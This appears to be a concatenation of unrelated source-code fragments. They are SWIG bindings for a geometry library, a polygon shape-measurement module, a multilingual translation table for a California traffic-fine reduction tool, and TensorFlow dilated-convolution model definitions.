IntAna2d_Conic.ValAndGrad = new_instancemethod(_IntAna2d.IntAna2d_Conic_ValAndGrad,None,IntAna2d_Conic)
IntAna2d_Conic.Coefficients = new_instancemethod(_IntAna2d.IntAna2d_Conic_Coefficients,None,IntAna2d_Conic)
IntAna2d_Conic.NewCoefficients = new_instancemethod(_IntAna2d.IntAna2d_Conic_NewCoefficients,None,IntAna2d_Conic)
IntAna2d_Conic._kill_pointed = new_instancemethod(_IntAna2d.IntAna2d_Conic__kill_pointed,None,IntAna2d_Conic)
IntAna2d_Conic_swigregister = _IntAna2d.IntAna2d_Conic_swigregister
IntAna2d_Conic_swigregister(IntAna2d_Conic)
class IntAna2d_IntPoint(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args): | |
# polytools.py
# ALS 2016/04/29
"""
Contain functions for shape measurements on polygons.
Does not support astropy unit
References:
https://en.wikipedia.org/wiki/Shape_factor_(image_analysis_and_microscopy)
https://en.wikipedia.org/wiki/Feret_diameter
PEER REVIEW Particle Shape Factors and Their Use in Image Analysis Part 1: Theory by <NAME>
Notation
--------
polys: list of poly
poly: (N*2) ndarray of double
list of corner coordinates (r,c)=(y,x) of the polygon.
Next developement steps:
1. build FeretD_max.
"""
import numpy as np
import skimage.measure as skmeasure
import collections
import astropy.table as at
def ShapeParamsTab_from_contours(contours, xc, yc):
"""
return a table of measurements from input contours (everything in pix unit) e.g. :
area_pix dmax_pix rmax_pix dper_pix theta_dmax theta_rmax theta_dper aspectr
-------- ------------- ------------- ------------- ------------- ------------- -------------- -------
8.0 3.60555127546 1.80277563773 3.60555127546 33.6900668147 146.309932696 -56.3099331853 1.0
"""
cols = ['area_pix', 'dmax_pix', 'rmax_pix', 'dper_pix', 'theta_dmax', 'theta_rmax', 'theta_dper', 'aspectr']
tab = at.Table(names=cols)
if len(contours)>0:
area = NetPolygonsArea(contours)
dferetmax, theta_dferetmax = FeretD_max(contours)
rferetmax, theta_rferetmax = FeretR_max(contours, xc, yc)
dferetper, theta_dferetper = FeretD_max90(contours)
aspectr = FeretAspectRatio(contours)
row = [area, dferetmax, rferetmax, dferetper, theta_dferetmax, theta_rferetmax, theta_dferetper, aspectr]
else:
row = [0., 0., 0., 0., np.nan, np.nan, np.nan, np.nan]
tab.add_row(row)
return tab
def find_centercontours(img, threshold, xc, yc, radius=3):
contours = find_contours(img, threshold)
return select_center_contours(contours, xc, yc, radius=radius)
def find_largecontours(img, threshold, minarea):
""" Find all isophote patch larger than certain area. See select_large_contours for details. """
contours = find_contours(img, threshold)
return select_large_contours(contours, minarea)
def find_contours(img, threshold, tocomplete=True):
"""
Return all isophote contours. Each contours is (N*2) ndarray of double.
High contours are counter-clockwise points and low contours are clockwise
points.
if tocomplete is True, even contours at edges are always closed.
"""
# negative edge padding to close all contours
if tocomplete: # to complete contours
wpad=2
img_pad = np.pad(img, [[wpad, wpad], [wpad, wpad]], mode='constant', constant_values=-1.e300)
contours = skmeasure.find_contours(img_pad, threshold, fully_connected='low', positive_orientation='high')
contours = [contour-wpad for contour in contours]
else:
contours = skmeasure.find_contours(img, threshold, fully_connected='low', positive_orientation='high')
return contours
def select_large_contours(contours, minarea):
"""
Find all patch that have areas above minarea. A patch is a highcontour plus all of its enclosing lowcontours. Here the holes are considered.
"""
large_highcontours = select_large_highcontours(contours, minarea)
results = []
for highcontour in large_highcontours:
patch = get_patches_of_highcontours(contours, [highcontour])
if NetPolygonsArea(patch) >= minarea:
results = results+patch
return unique_polys(results)
def select_large_highcontours(contours, minarea):
"""
Find all high contours that have areas above minarea (in pixel). The holes within the high contours are ignored.
"""
results = []
for contour in contours:
if SignedPolygonArea(contour) >= minarea:
results = results+[contour]
return unique_polys(results)
def select_center_contours(contours, xc, yc, radius=3):
highcontours = select_center_highcontours(contours, xc, yc, radius=radius)
allcontours = get_patches_of_highcontours(contours, highcontours)
return allcontours
def select_center_highcontours(contours, xc, yc, radius=3):
"""
select all the high contours in contours that overlaps with the center region, which is defeined as a square region (xc +/- radius, yc +/- radius).
Find all high contours that enclose the centroid xc, yc. +/- radius
# if skmeasure.points_in_poly([[yc, xc]], contour):
"""
# setting
carea = np.pi * radius**2
ptc = np.array([xc, yc])
highcontours = select_highcontours(contours)
ccontours = []
for contour in highcontours:
if SignedPolygonArea(contour) >= carea:
if skmeasure.points_in_poly(np.array([ptc]), contour)[0]:
ccontours = ccontours+[contour]
else:
if contour_is_close_to_point(contour, ptc, distance=radius):
ccontours = ccontours+[contour]
return ccontours
def contour_is_close_to_point(contour, pt, distance=1.):
dissq = ((pt[0]-contour[:, 0])**2 + (pt[1]-contour[:, 1])**2)
result = np.any(dissq <= distance**2)
return result
def select_highcontours(contours):
"""
select high contours within contours
"""
highcontours = []
for contour in contours:
if SignedPolygonArea(contour) > 0.:
highcontours = highcontours+[contour]
return highcontours
def select_lowcontours(contours):
"""
select low contours within contours
"""
lowcontours = []
for contour in contours:
if SignedPolygonArea(contour) < 0.:
lowcontours = lowcontours+[contour]
return lowcontours
def select_enclosedcontours(contours, outcontours):
"""
Among 'contours', select the ones that are enclosed by 'outcontours'. The contours that are identical to any of the outcontours are not included.
"""
contours = to_polys(contours)
outcontours = to_polys(outcontours)
incontours = []
for contour in contours:
isinsides = np.array([isinside_polygon(contour, outcontour) for outcontour in outcontours])
isequals = np.array([isequal_polygon(contour, outcontour) for outcontour in outcontours])
if any(isinsides) and all(~isequals):
incontours = incontours+[contour]
return incontours
def to_polys(poly):
if ispolys(poly):
return poly
else:
if ispolys([poly]):
return [poly]
else:
raise ValueError("input not polys or poly")
def get_patches_of_highcontours(contours, highcontours):
""" find all the low contours enclosed in the highcontours, return highcontours + enclosed low contours """
if not ispolys(highcontours):
raise ValueError("[polytools] highcontours is not polys")
if not ispolys(contours):
raise ValueError("[polytools] contours is not polys")
lowcontours = select_lowcontours(contours)
lowcontours = select_enclosedcontours(lowcontours, highcontours)
allcontours = highcontours+lowcontours
allcontours = unique_polys(allcontours)
return allcontours
def unique_polys(polys):
"""
Return unique polys
"""
uniqpolys = []
for poly in polys:
if not any([isequal_polygon(p, poly) for p in uniqpolys]):
uniqpolys.append(poly)
return uniqpolys
def ispolys(polys):
"""
tell if 'polys' is a list of polygons, which are np arrays of (x,y) points.
"""
if isinstance(polys, (list, np.ndarray)):
if np.all([ispoly(poly) for poly in polys]):
return True
else:
return False
else:
return False
def ispoly(poly):
"""
return True if poly is a np array of shape (N,2)
"""
if isinstance(poly, np.ndarray):
if len(poly.shape) == 2 and poly.shape[-1] == 2:
return True
else:
return False
else:
return False
def isequal_polygon(poly1, poly2):
""" tell if these two polygons are equal """
return np.array_equal(poly1, poly2)
def isinside_polygon(poly1, poly2):
""" tell if poly1 is enclosed by poly2, i.e. all the points are inside.
Identical polys are not inside each other """
return np.all(skmeasure.points_in_poly(poly1, poly2))
def NetPolygonsArea(polys):
"""
Calculate the net area of a groupd of polygons. Counter-clock wise
polygons have positive areas while clock-wise ones have negative.
Parameters
----------
polys : list of polygons, each is a (N*2) array of corner coordinates
list of polygons to use
Returns
-------
area : float
"""
area = 0.0
for i in range(len(polys)):
area += SignedPolygonArea(polys[i])
return area
def SignedPolygonArea(poly):
"""
Calculate the signed area inside a polygon using Shoelace formula.
Positive for clock wise (on x-y plane) polygons.
Applied correction to take into account the fact that the four corners of the box can be dropped because of the interpolation. After the correction, we get exact area for the contours of a binary file where the threshold is set to 0.5. See test_polytools.py
Parameters
----------
poly : (N*2) ndarray of double
list of corner coordinates (r,c) = (y,x) of the polygon
N is the number of corners.
Returns
-------
area : float
Reference
-------
https://en.wikipedia.org/wiki/Shoelace_formula
http://stackoverflow.com/questions/24467972/calculate-area-of-polygon-given-x-y-coordinates
"""
n = len(poly) # of poly
area = 0.0
for i in range(n):
j = (i + 1) % n
area += poly[i][0] * poly[j][1]
area -= poly[j][0] * poly[i][1]
area = area / 2.0
if np.isfinite(area):
if area > 0:
cornercorrection = 0.5
elif area == 0:
cornercorrection = 0.
elif area < 0:
cornercorrection = -0.5
return area + cornercorrection
else:
print("[polytools] WARNING nan area encountered")
return 0.
def FeretDiameter(sth,theta):
"""
Return the Feret's diamter along the direction of theta (y of x.) of the object 'sth'. 'sth' can either be polys (list of poly) or poly (array of shape (N,2)). Only high contours are considered.
Parameters
----------
sth: either polys or poly
polys: list of poly
poly: (N*2) ndarray of double
list of corner coordinates (r,c) of the polygon.
theta: (float)
the angle of the direction being measured. y of x in degrees.
Returns
----------
d_feret: (float)
the Feret's diameter in pix
"""
# define unit vector (r,c)=(y,x) along the direction of theta
listpoints = np.ndarray([0,2])
if ispolys(sth):
polys = sth
for poly in polys:
if SignedPolygonArea(poly)>0.:
listpoints = np.append(listpoints,poly,axis=0)
elif ispoly(sth):
poly=sth
if SignedPolygonArea(poly)>0.:
listpoints = np.append(listpoints,poly,axis=0)
else:
raise ValueError('input is neither a poly nor polys')
unitvec=np.array([np.sin(np.radians(theta)),np.cos(np.radians(theta))])
d = listpoints.dot(unitvec)
dotmax=np.max(d,axis=0)
dotmin=np.min(d,axis=0)
return np.absolute(dotmax-dotmin)
def FeretRadius(sth, theta, xc, yc):
"""
Like FeretDiameter but return the max radius (distance between edge and centroid) along the direction theta.
Parameters
----------
sth: either polys or poly
theta: (float)
the angle of the direction being measured. y of x in degrees.
xc, yc: (float)
the centroid coordinate
Returns
----------
r_feret: (float)
the Feret's diameter in pix
"""
# define unit vector (r,c)=(y,x) along the direction | |
<gh_stars>0
# -*- coding: utf-8 -*-
_translations = {
"req_fine_reduction": {
"en": "###Request a Fine Reduction",
"es": "###Cómo solicitar una reducción de multa",
"zh-s": "###请求减少罚款",
"zh-t": "###請求減少罰款"
},
"landing_page_description": {
"en":
"""*This online system is an optional way to request a fine reduction for your traffic ticket in cases of financial need.*
**Use this tool to:**
* Request a reduction in your traffic fine
* Request a payment plan
* Request Community Service
* Request more time to pay your ticket
**Do not use this tool:**
* If you wish to contest the ticket
* If your offense is a misdemeanor violation
* If you would like to attend traffic school
* If you have proof of correction and would like a dismissal or reduction of those charges
Please refer to your courtesy notice or contact your court instead.""",
"es":
"""*Este sistema en línea es una manera opcional de solicitar una reducción en su multa de tránsito debido a una necesidad económica.*
**Use este servicio para solicitar:**
* Una reducción de su multa de tránsito
* Un plan de pagos
* Servicio comunitario
* Más tiempo para pagar su multa
**No use este servicio:**
* Si quiere disputar la multa
* Si su ofensa es una violación por delito menor
* Si desea asistir a la escuela de tránsito
* Si tiene un comprobante de corrección y desea reducir la multa
Por favor refiérase a su aviso de cortesía o comuníquese con su corte.
""",
"zh-s":
"""*如果您有财务需要,本在线系统是请求减少交通罚单罚款的可选途径。*
**使用该工具请求:**
* 减少您的交通罚款
* 支付计划
* 社区服务
* 延长支付罚单时间
*如果您想对罚单提出异议,或者亲自解决问题,请联系您的法院。请参阅您的提醒通知。*""",
"zh-t":
"""*如果您有財務需求,本線上系統是請求減少交通罰單罰款的途徑之一。*
**使用本工具請求:**
* 減少您的交通罰款
* 付款計劃
* 社區服務
* 延長支付罰單的時間
*如果您想對罰單提出異議,或是親自解決問題,請聯繫您的法院。請參閱您的提醒通知。*"""
},
"lookup_citation": {
"en": "### Look Up Your Citation",
"es": "### Busque su citación",
"zh-s": "### 查看您的罚单",
"zh-t": "### 查看您的罰單"
},
"what_county": {
"en": "What California county did you get the citation in?",
"es": "¿En qué condado de California recibió la citación?",
"zh-s": "您在加州哪个县得到罚单?",
"zh-t": "您在加州哪個縣得到罰單?"
},
"what_citation_number": {
"en": "What's the citation number?",
"es": "¿Cuál es el número de citación?",
"zh-s": "罚单号码是多少?",
"zh-t": "罰單號碼是多少?"
},
"dont_have_citation_number": {
"en": "I don't have my citation number",
"es": "No tengo mi número de citación",
"zh-s": "我没有罚单号码",
"zh-t": "我沒有罰單號碼"
},
"what_first_name": {
"en": "What is your first name?",
"es": "¿Cuál es su nombre?",
"zh-s": "您的名字是什么?",
"zh-t": "您的名字是什麼?"
},
"what_last_name": {
"en": "What is your last name?",
"es": "¿Cuál es su apellido?",
"zh-s": "您的姓是什么?",
"zh-t": "您的姓是什麼?"
},
"what_dob": {
"en": "What's your date of birth?",
"es": "¿Cuál es su fecha de nacimiento?",
"zh-s": "您的出生日期是哪天?",
"zh-t": "您的出生日期是哪天?"
},
"what_license_number": {
"en": "What is your Driver's License Number?",
"es": "¿Cuál es el número de su licencia de manejar?",
"zh-s": "您的驾照号码是多少?",
"zh-t": "您的駕照號碼是多少?"
},
"name": {
"en": "Name",
"es": "Nombre",
"zh-s": "姓名",
"zh-t": "姓名"
},
"citation_number": {
"en": "Citation Number",
"es": "Número de citación",
"zh-s": "罚单号码",
"zh-t": "罰單號碼"
},
"county": {
"en": "County",
"es": "Condado",
"zh-s": "县",
"zh-t": "縣"
},
"violation_date": {
"en": "Violation Date",
"es": "Fecha de la infracción",
"zh-s": "违规日期",
"zh-t": "違規日期"
},
"total_due": {
"en": "Total Due",
"es": "Monto que se debe",
"zh-s": "应付总额",
"zh-t": "應付總額"
},
"yes": {
"en": "Yes",
"es": "Sí",
"zh-s": "是",
"zh-t": "是"
},
"no": {
"en": "No",
"es": "No",
"zh-s": "没有",
"zh-t": "否"
},
"your_citations": {
"en": "### Your Citations",
"es": "### Sus citaciones",
"zh-s": "",
"zh-t": ""
},
"need_more_info": {
"en": "We need some more information to find your citation: ",
"es": "Necesitamos más información para encontrar su citación:",
"zh-s": "",
"zh-t": ""
},
"found_multiple_citations": {
"en": "We found your citation. We also looked for other citations in your name in {county} County. You can request fine reductions for all the citations listed below.",
"es": "Encontramos su citación. También buscamos otras citaciones bajo su nombre en el condado de {county}. Puede solicitar una reducción en las multas para todas las citaciones que aparecen abajo.",
"zh-s": "",
"zh-t": ""
},
"select_citation": {
"en": "Select each of the tickets for which you want to request a reduction.",
"es": "Seleccione las citaciones para las que desea solicitar una reducción.",
"zh-s": "",
"zh-t": ""
},
"none_of_these_are_right": {
"en": "None of these are right",
"es": "Ninguna de estas es mía",
"zh-s": "",
"zh-t": ""
},
"how_this_works": {
"en": "### How this works",
"es": "### Cómo funciona este servicio",
"zh-s": "### 如何运作",
"zh-t": "### 如何運作"
},
"dont_have_citation_number": {
"en": "I don't have my citation number",
"es": "No tengo mi número de citación",
"zh-s": "我没有罚单号码",
"zh-t": ""
},
"how_works_instructions": {
"en": """
*We will walk you through a few questions to help the Court better understand your need for a reduction.*
Be prepared to share information about your income, monthly expenses and any public benefits you currently receive. A court official will still review your answers as they would if you came to court in person.
""",
"es": """
*Le haremos algunas preguntas para que la corte pueda comprender mejor su necesidad de reducir la multa.*
Esté preparado para compartir información sobre sus ingresos, gastos mensuales y cualquier beneficio público que recibe actualmente. Sus respuestas serán revisadas por un funcionario judicial como si fuera a la corte en persona.
""",
"zh-s": """
*我们将通过几个问题帮助法院更好地了解您要减少罚款的需求。*
请准备好分享您的收入、每月开支及目前领取的公共福利。法院官员仍然会像您亲自来法院一样审查您的答案。
""",
"zh-t": """
*我們將透過幾個問題幫助法院更瞭解您要減少罰款的需求。*
請準備好分享您的收入、每月開支及目前領取的公共福利。法院官員仍然會像您親自來法院一樣審查您的答案。
"""
},
"public_benefits": {
"en": "### Public Benefits",
"es": "### Beneficios públicos",
"zh-s": "### 公共福利",
"zh-t": "### 公共福利"
},
"receiving_benefits": {
"en": "Are you currently receiving any benefits? If you don''t see the public benefit you are currently enrolled in, click \"Other\".",
"es": "¿Está recibiendo beneficios actualmente? Si no ve el beneficio público que está recibiendo actualmente, haga clic en \"Otro\".",
"zh-s": "您目前是否在领取任何福利?如果您没有看到您目前登记的公共福利,点击“其他”",
"zh-t": "您目前是否領取任何福利?如果您沒有看到您目前登記的公共福利,請點選「其他」"
},
"cal_fresh": {
"en": "CalFresh (Food Stamps)",
"es": "CalFresh (cupones de alimentos)",
"zh-s": "CalFresh(食品券)",
"zh-t": "CalFresh(糧食券)"
},
"medi_cal": {
"en": "Medi-Cal",
"es": "Medi-Cal",
"zh-s": "Medi-Cal",
"zh-t": "Medi-Cal"
},
"cr_ga": {
"en": "General Assistance / County Relief",
"es": "Ayuda general/Ayuda del condado",
"zh-s": "普通救助/ 县救济",
"zh-t": "普通救助/ 縣救濟"
},
"ssi": {
"en": "SSI: Supplemental Security Income",
"es": "SSI: Seguridad de ingreso suplementario",
"zh-s": "SSI:社会安全补助金",
"zh-t": "SSI:社會安全補助金"
},
"wic": {
"en": "WIC: Special Supplemental Nutrition for Women, Infants and Children",
"es": "WIC: Programa de Nutrición y Alimentos para Mujeres, Bebés y Niños",
"zh-s": "",
"zh-t": ""
},
"ssp": {
"en": "SSP: State Supplemental Payment",
"es": "SSP: Pagos suplementarios del estado",
"zh-s": "SSP:州补助金",
"zh-t": "SSP:州補助金"
},
"ihss": {
"en": "IHSS: In Home Supportive Services",
"es": "IHSS: Servicios de apoyo en el hogar",
"zh-s": "IHSS:居家支持服务",
"zh-t": "IHSS:居家支援服務"
},
"cal_works": {
"en": "CalWORKS: California Work Opportunity and Responsibility to Kids Act",
"es": "CalWORKs: Oportunidades de trabajo y responsabilidades hacia los niños de California",
"zh-s": "CalWORKS:《加州工作机会及对孩子责任法案》",
"zh-t": "CalWORKS:《加州工作機會及對孩子責任法案》"
},
"tanf": {
"en": "TANF: Temporary Assistance for Needy Families",
"es": "TANF: Ayuda temporal para familias necesitadas",
"zh-s": "TANF:穷困家庭临时救助",
"zh-t": "TANF:窮困家庭臨時救助"
},
"capi": {
"en": "CAPI: Cash Assistance Program for Aged, Blind or Disabled Legal Immigrants",
"es": "CAPI: Programa de ayuda en efectivo para inmigrantes legales ancianos, no videntes o discapacitados",
"zh-s": "CAPI:老人、盲人或残障合法移民现金救助计划",
"zh-t": "CAPI:老人、盲人或殘障合法移民現金救助計畫"
},
"other": {
"en": "Other",
"es": "Otro",
"zh-s": "其他",
"zh-t": "其他"
},
"other_benefit_name": {
"en": "What's the other public benefit you receive?",
"es": "¿Cómo se llama el beneficio público que recibe? Nota: debe responder esta pregunta en inglés.",
"zh-s": "",
"zh-t": ""
},
"proof_calfresh": {
"en": "Proof of CalFresh",
"es": "### Comprobante de CalFresh",
"zh-s": "### CalFresh 的证明",
"zh-t": ""
},
"calfresh_upload": {
"en": "### You said you receive CalFresh. Can you please upload any document that proves you are currently receiving this benefit - like a CalFresh card?",
"es": "### Usted dijo que recibe CalFresh. ¿Puede subir un documento que demuestre que está recibiendo actualmente este beneficio, como por ejemplo una tarjeta de CalFresh?",
"zh-s": "",
"zh-t": ""
},
"calfresh_card": {
"en": "CalFresh Card",
"es": "Tarjeta de CalFresh",
"zh-s": "",
"zh-t": ""
},
"have_no_proof": {
"en": "I don't have proof available",
"es": "No tengo un comprobante en este momento",
"zh-s": "我现在没有证明",
"zh-t": "我現在沒有證明"
},
"why_no_proof": {
"en": "Tell us why you can't provide documentation at this time",
"es": "Explique por qué no puede darnos documentación en este momento. Nota: debe responder esta pregunta en inglés.",
"zh-s": "告诉我们您为何现在不能提供文件",
"zh-t": "告訴我們您為何現在不能提供文件"
},
"proof_of_medical": {
"en": "### Proof of Medi-Cal",
"es": "### Comprobante de Medi-Cal",
"zh-s": "###Medi-Cal 的证明",
"zh-t": ""
},
"upload_medical": {
"en": | |
import numpy as np
import tensorflow as tf
import sys
import gc
import time
#from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops.rnn import bidirectional_dynamic_rnn
from tf_utils import variable_summaries, _batch_norm
from custom_ops import atrous_pool2d
def weight_variable(shape, name=None):
initial = tf.truncated_normal(shape, stddev=0.1)
w_var = tf.Variable(initial, name=name)
if name != None:
variable_summaries(w_var, name)
return w_var
def bias_variable(shape, name=None):
initial = tf.constant(0.1, shape=shape)
b_var = tf.Variable(initial, name=name)
if name != None:
variable_summaries(b_var, name)
return b_var
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def atrous_conv2d(x, W, rate):
return tf.nn.atrous_conv2d(x, W, rate, padding='SAME')
def max_pool(x, kH):
return tf.nn.max_pool(x, ksize=[1, kH, 1, 1],
strides=[1, 1, 1, 1], padding='SAME')
def atrous_pool(x, kH, dilation_rate):
return atrous_pool2d(x, ksize=[1, kH, 1, 1], rate=dilation_rate, padding="SAME", pooling_type="MAX")
# return tf.nn.pool(x, dilation_rate=[dilation_rate, 1], window_shape=[kH, 1],
# padding='VALID', pooling_type="MAX")
def dilated_convolution_model(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
#dim_reduction = 10
#nkernels = [128, 240, 50]
#hidden = 125
embedding_size = 4
W = {
"conv1": weight_variable([1*dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]], "W_conv2"),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]]),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([1*dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
#"conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
#"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
# and a empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, 1*dim_reduction, 1, 1], padding='SAME') + b["conv1"]), dropout_keep_prob)
h_conv2 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv1, W["conv2"], 3) + b["conv2"]), dropout_keep_prob)
h_conv3 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv2, W["conv3"], 9) + b["conv3"]), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"]), dropout_keep_prob)
h_conv5 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv4, W["conv5"], 81) + b["conv5"]), dropout_keep_prob)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, 1*dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def dilated_convolution_model_batchnorm(x, y_, dropout_keep_prob, batch_size, noutputs, is_training, decay_rate, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
W = {
"conv1": weight_variable([1*dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([1**dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
#"conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
#"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
# and a empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, 1*dim_reduction, 1, 1], padding='SAME') + b["conv1"]
h_conv1_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv1, is_training, decay_rate, "conv1-norm")), dropout_keep_prob)
h_conv2 = atrous_conv2d(h_conv1_norm, W["conv2"], 3) + b["conv2"]
h_conv2_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv2, is_training, decay_rate, "conv2-norm")), dropout_keep_prob)
h_conv3 = atrous_conv2d(h_conv2_norm, W["conv3"], 9) + b["conv3"]
h_conv3_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv3, is_training, decay_rate, "conv3-norm")), dropout_keep_prob)
h_conv4 = atrous_conv2d(h_conv3_norm, W["conv4"], 27) + b["conv4"]
h_conv4_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv4, is_training, decay_rate, "conv4-norm")), dropout_keep_prob)
h_conv5 = atrous_conv2d(h_conv4_norm, W["conv5"], 81) + b["conv5"]
h_conv5_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv5, is_training, decay_rate, "conv5-norm")), dropout_keep_prob)
h_conv6 = tf.nn.conv2d_transpose(h_conv5_norm, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, 1*dim_reduction, 1, 1]) + b["conv6"]
h_conv6_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv6, is_training, decay_rate, "conv6-norm")), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6_norm), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6_norm]
def dilated_convolution_with_pooling(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
# and a empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"]), dropout_keep_prob)
h_conv1_pooled = max_pool(h_conv1, filter_height)
h_conv2 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv1_pooled, W["conv2"], 3) + b["conv2"]), dropout_keep_prob)
h_conv2_pooled = max_pool(h_conv2, filter_height)
h_conv3 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv2_pooled, W["conv3"], 9) + b["conv3"]), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"]), dropout_keep_prob)
h_conv4_pooled = max_pool(h_conv4, filter_height)
h_conv5 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"]), dropout_keep_prob)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def dilated_convolution_with_pooling_batchnorm(x, y_, dropout_keep_prob, batch_size, noutputs, is_training, decay_rate, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
